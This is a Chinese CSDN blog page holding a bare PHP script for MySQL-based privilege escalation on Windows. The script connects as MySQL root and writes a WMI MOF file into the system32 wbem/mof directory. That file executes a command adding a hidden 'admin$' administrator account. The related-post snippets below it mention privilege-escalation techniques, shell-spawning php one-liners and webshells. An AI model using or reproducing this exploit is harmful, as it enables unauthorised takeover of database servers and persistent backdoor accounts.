mysql远程提权_MySQL远程提权php版

最新推荐文章于 2023-02-15 23:26:52 发布
最新推荐文章于 2023-02-15 23:26:52 发布
阅读量73 收藏
点赞数
文章标签: mysql远程提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28839629/article/details/113163651
版权

[php]

$mysql_server_name='localhost';

$mysql_username='root';

$mysql_password='';

$mysql_database='mysql';

$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);

$cmdshell="net user admin$ qwe!@#123qwe /add";

$payload = "#pragma namespace(\"\\\\\\\\.\\\\root\\\\subscription\")

instance of __EventFilter as \$EventFilter

{

EventNamespace = \"Root\\\\Cimv2\";

Name = \"filtP2\";

Query = \"Select * From __InstanceModificationEvent \"

\"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \"

\"And TargetInstance.Second = 5\";

QueryLanguage = \"WQL\";

};

instance of ActiveScriptEventConsumer as \$Consumer

{

Name = \"consPCSV2\";

ScriptingEngine = \"JScript\";

ScriptText =

\"var WSH = new ActiveXObject(\\\"WScript.Shell\\\")\\nWSH.run(\\\"$cmdshell\\\")\";

};

instance of __FilterToConsumerBinding

{

Consumer = \$Consumer;

Filter = \$EventFilter;

};";

mysql_select_db($mysql_database,$conn);

$sql="select '$payload' into outfile 'c:/windows/system32/wbem/mof/nullevt.mof';";

$result=mysql_query($sql);

mysql_close($conn);

?>

[/php]

Badger4us
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php,一次实战
weixin_39996096的博客
03-10 1141
原标题:一次实战闲来没事,朋友发给我一个站,需要,然后那就试试吧,于是就有了接下来的文章,大牛勿喷https://xxxxxx/……/Abstract.aspx(地址不方便公布)猜测:已经上了一个aspx的大马,看来支持aspx那就可能有mssql环境,可能开放了1433,待会可以利用sa等等有关mssql的方法: 然后打开访问看看: 熟悉的界面,那我们先来搜集一下基本信息: 从这...
【靶机测试--PHOTOGRAPHER: 1【php】】
最新发布
qq_74240553的博客
03-19 826
vulnhub靶机
PHP最高限的获取
dgnankai的专栏
08-04 772
默认情况下,php启动后,限仅仅属于www组的,它无改动别的用户创建的恶目录、文件。如果我们需要强制操作,系统就会报错,操作无法成功。 这是可以将PHP改为root组,这样就可以解决如上问题。当然请大家注意网络安全,因为网站一旦被黑,整个系统就会沦陷。 环境:CentOS7、宝塔面板、nginx、php4.7...
PHP姿势
她叫常玉莹
09-08 2889
ShellCommandReverse ShellFile uploadFile downloadSUIDSudoCapabilities Shell export CMD="/bin/sh" php -r 'system(getenv("CMD"));' export CMD="/bin/sh" php -r 'passthru(getenv("CMD"));' export CMD="/bin/sh" php -r 'print(shell_exec(getenv("CMD")));' expo.
初涉内网,那些事
xxxxxibdrgn的博客
11-03 805
对于内核就写到这啦 整体看下来应该都会有一个比较清楚的认知吧 不懂的话多看几遍 相对来说是写的比较详细的了。关于内网还有很多需要学习的知识 像后的限维持、横向移动、后渗透、痕迹清理、不同平台的不同方式、以及进阶的域渗透。后期有空了会更新有关内容的文章。学海无涯,希望大家每天都能学到新知识升自己,学到的东西可不要做非法的事哈!!!!个人博客链接: https://webgotd.com。
Labview之远程连接MySQL数据库.rar_labview ODBC MySQL_labview 远程_labview远程
07-13
labview 2014 32位 在64位电脑上启动32位ODBC,并安装驱动,可实现labview远程访问MySQL
delphi远程连接MySQL(完美)
04-15
demo使用delphi的SQLconnection控件完美实现MySQL的远程连接,代码简洁规范,不需要安装odbc驱动.
PHP远程连接MYSQL数据库非常慢的解决方法
10-30
如果一个问题出现两次,那么这个问题就值得去研究下了,上次客户说MYSQL数据库很慢,我还在想,不会是PHP的问题吧?
MYsql远程调用执行MYsql语句
10-27
支持本地 远程 域名方式连接数据库 并执行MYsql语句,带返回信息 一共3条命令 连接数据库 远程执行SQL语句 关闭数据库连接 变量 DLL路径 = “插件放置的路径” 文本型 变量 IP = “数据库的IP地址,支持域名” 文本...
PHP无法访问远程mysql的问题分析及解决
10-27
首先说明,远程服务器是可远程访问的,经过一番折腾最后想到了SELINUX的问题,对比了下AB两台机器,果然设置不一样!估计就是它的问题
php脚本
05-03
php脚本
PHP入侵+拿服务器.rar
12-03
PHP入侵+拿服务器.rarPHP入侵+拿服务器.rar
MySql连接工具
10-18
连接后可以自动写入NC.EXE ,FTP.EXE等到目标机器,并且支持CMD命令 前是你知道目标机器ROOT信息 可以连接3306
Linux利用UDF库实现Mysql
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
大马 秒杀安全狗 无后门 限强大
01-05
asp 大马 秒杀安全狗 无后门 限强大
升】六种数据库&口令获取
今天是几号的博客
02-15 1466
MSF会将dll文件写入lib\plugin\目录下(前是该目录存在,需手工创建),该dll文件中包含sys_exec()和sys_eval()两个函数,但是默认只创建sys_exec()函数,该函数执行并不会有回显。其9.3到11本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”限的用户,可以使用这个特性执行任意命令。前是拥有一个普通的oracle连接账号,不需要DBA限,可至DBA,并以oracle实例运行的限执行操作系统命令。绑定需要访问数据库的IP。
php教程,thinkphp 5.x本代码执行可直接getshell
weixin_39647412的博客
03-10 1447
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的本包括5.0和5.1本,推荐尽快更新到最新本。影响范围5.x < 5.1.31, <= 5.0.23漏洞分析Thinkphp v5.0.x补丁地址: htt...
php用户root,CVE-2017-9841到root
weixin_33539366的博客
03-20 475
简单来说漏洞是出在phpunit,可以使用composer安装,vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, 这个文件可以造成RCE:$curl--data"
mysql 远程登陆设置_MYSQL远程登录限设置
05-31
要允许MySQL数据库的远程登录,需要进行以下步骤: 1. 修改MySQL配置文件my.cnf或my.ini,在[mysqld]下添加一行代码:bind-address=0.0.0.0,表示绑定所有IP地址,保存并关闭文件。 2. 在MySQL数据库中创建远程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值